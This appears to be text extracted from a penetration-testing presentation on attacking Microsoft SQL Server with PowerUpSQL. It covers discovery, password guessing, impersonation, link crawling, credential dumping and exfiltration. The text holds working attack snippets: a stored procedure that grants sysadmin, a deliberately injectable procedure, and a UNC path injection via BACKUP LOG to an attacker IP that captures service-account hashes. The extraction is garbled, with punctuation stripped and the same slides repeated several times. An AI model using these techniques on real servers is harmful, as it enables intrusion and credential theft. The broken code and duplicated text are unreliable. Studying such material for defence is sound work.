bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Scalability via runspace threading Flexibility via pipeline support
ps objects and data tables Portability
o No SMO dependancieso Net Framework librarieso PowerShell v2 compliant (in theory)o Single file
Functional Goals Discover SQL Servers from different attacker perspectives Inventory SQL Servers quickly Audit SQL Servers for common insecure configurations Escalate privileges quickly on SQL Servers Support authentication using SQL Login or Windows Credential
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
